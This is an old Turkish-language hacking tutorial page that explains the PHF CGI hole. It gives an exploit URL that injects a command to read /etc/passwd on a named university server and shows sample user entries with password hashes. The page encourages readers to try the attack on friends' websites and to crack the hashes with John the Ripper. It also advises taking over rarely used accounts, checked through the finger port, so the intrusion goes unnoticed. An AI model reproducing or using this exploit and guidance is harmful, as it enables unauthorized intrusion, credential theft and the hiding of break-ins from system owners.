WWW HACK NEDIR???line.gif (4491 bytes)

  WWW hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini haçk etmek için kullanilmis ve basarili olmustur.Tabi bu durum dan sonra FBI bu hatasini gidermis tir.Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir çok eski server da hala uygulanmakta ve netice alinabilmektedir özellik le japon webçilerinde bu hataya çok rastlanilir örnek vermek gerekirse:

http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

  Satirini browserinize yazip enter e basin bu satir passwd dosyasini açmaya çalisacaktir(adresi attim)

  Error 404

/cgi-bin/phf is not found on this server

  Bu satir lar karsiniza çikarsa bilinki server yeni ve size geçit vermiyor

  Ama asagidaki listeyi verir se bilinki buldunuz:)))

  /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd

  root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

  www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh

  asprilla:3A62i9qr.YmO.:1012:10:kafka

  CAFER:/home/user/asprilla:/usr/local/bin/tcsh

  hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh

  necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh

  güloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/güloglu:/bin/csh

 

  PHF teknigini arkada?larinizin web page larini hack etmek için deniye bilirsiniz:))) tabi yukardaki satirlari en iyi ihtimali göz önüne alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yaani a?agidaki gibi:

  root:*:0:1:Operator:/:/bin/csh

  www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

  asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh

  hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh

  necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh

  güloglu:*:1007:10:kemal GULOGLU:/home/user/güloglu:/bin/csh

 

  Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece gülüyorum shadowed kirmak bence imkansiz ama yinede john the ripper i çekip deneyebilirsiniz.Hiç bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak için shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.

line.gif (4491 bytes)©2001  STEALA ONLINEAll right Reserved. MaiL To: admin@steala.cjb.net